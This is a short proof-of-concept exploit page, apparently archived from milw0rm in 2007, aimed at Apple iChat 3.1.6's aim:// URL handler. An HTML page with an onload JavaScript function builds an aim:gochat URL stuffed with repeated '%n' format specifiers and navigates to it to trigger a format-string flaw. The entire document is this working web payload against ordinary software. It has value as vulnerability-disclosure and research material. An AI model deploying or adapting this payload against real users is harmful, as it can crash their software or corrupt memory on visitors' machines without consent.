Apple iChat 3.1.6 441 - aim:// URL Handler Format String Exploit PoC



<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"

    "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html>
    <head>
        <title>MOAB-20-01-2007</title>
        <script>
            function boom() {
                var str = '';
                for (var i = 0; i < 20; i++) {
                    str = str + escape('A%n');
                }
                str = 'aim:gochat?roomname=' + str;
                window.location = str;
            }
        </script>
    </head>
    <body onload="boom()">
    </body>
</html>

# milw0rm.com [2007-01-21]